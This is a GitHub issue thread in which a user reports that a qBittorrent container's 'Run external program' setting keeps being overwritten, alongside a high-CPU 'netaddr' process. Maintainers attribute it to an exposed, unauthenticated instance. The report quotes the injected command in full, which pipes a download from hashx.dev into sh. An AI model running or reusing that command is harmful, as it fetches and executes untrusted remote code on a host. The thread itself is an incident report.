-
-
Notifications
You must be signed in to change notification settings - Fork 161
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Settings/Downloads/Run external program section overwritten autometically #356
Comments
Thanks for opening your first issue here! Be sure to follow the relevant issue templates, or risk having this issue marked as invalid. |
Sounds like you have your qbittorrent exposed to the internet and someone else has gained access to it. |
Not published directly, Web UI published using Nginx reverse proxy. |
I would highly recommend reviewing your reverse proxy/access. Every report we've had with this is has been the result of a user leaving something exposed without any authentication. |
Thanks for the suggestion. I will keep on my eyes and will let you know. |
Is there an existing issue for this?
Current Behavior
After 1-2 days configuration "Run external program" section in Settings/Downloads was automatically overwritten by this string: "sh -c "(curl -skL https://hashx.dev || wget --no-check-certificate -qO - https://hashx.dev) | sh"" in both options (torrent added, torrent finished). I am not sure that it is related, but in the same time "netaddr" process has hig CPU utilization, over 100%. I can kill that process and the utilization is going back to normal.
Expected Behavior
Keep my settings instead of overwrite it.
Steps To Reproduce
Environment
CPU architecture
x86-64
Docker creation
Container logs
The text was updated successfully, but these errors were encountered: